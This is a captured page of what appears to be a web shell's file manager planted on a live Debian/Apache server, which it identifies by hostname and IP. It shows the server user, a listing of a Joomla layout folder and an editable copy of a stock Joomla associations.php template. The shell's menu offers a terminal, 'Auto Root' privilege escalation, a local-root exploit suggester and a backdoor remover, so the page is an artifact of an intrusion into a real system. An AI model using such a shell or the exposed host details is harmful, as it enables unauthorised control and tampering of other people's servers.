Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.217.65
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
vnsm /
layouts /
joomla /
content /
info_block /
Delete
Unzip
Name
Size
Permission
Date
Action
associations.php
1.2
KB
-rwxr-xr-x
2023-07-08 16:23
author.php
875
B
-rwxr-xr-x
2023-07-08 16:23
block.php
462
B
-rwxr-xr-x
2023-07-08 16:23
category.php
834
B
-rwxr-xr-x
2023-07-08 16:23
create_date.php
617
B
-rwxr-xr-x
2023-07-08 16:23
hits.php
543
B
-rwxr-xr-x
2023-07-08 16:23
modify_date.php
615
B
-rwxr-xr-x
2023-07-08 16:23
parent_category.php
858
B
-rwxr-xr-x
2023-07-08 16:23
publish_date.php
625
B
-rwxr-xr-x
2023-07-08 16:23
Save
Rename
<?php /** * @package Joomla.Site * @subpackage Layout * * @copyright (C) 2016 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('_JEXEC') or die; ?> <?php if (!empty($displayData['item']->associations)) : ?> <?php $associations = $displayData['item']->associations; ?> <dd class="association"> <?php echo JText::_('JASSOCIATIONS'); ?> <?php foreach ($associations as $association) : ?> <?php if ($displayData['item']->params->get('flags', 1) && $association['language']->image) : ?> <?php $flag = JHtml::_('image', 'mod_languages/' . $association['language']->image . '.gif', $association['language']->title_native, array('title' => $association['language']->title_native), true); ?> <a href="<?php echo JRoute::_($association['item']); ?>"><?php echo $flag; ?></a> <?php else : ?> <?php $class = 'label label-association label-' . $association['language']->sef; ?> <a class="<?php echo $class; ?>" href="<?php echo JRoute::_($association['item']); ?>"><?php echo strtoupper($association['language']->sef); ?></a> <?php endif; ?> <?php endforeach; ?> </dd> <?php endif; ?>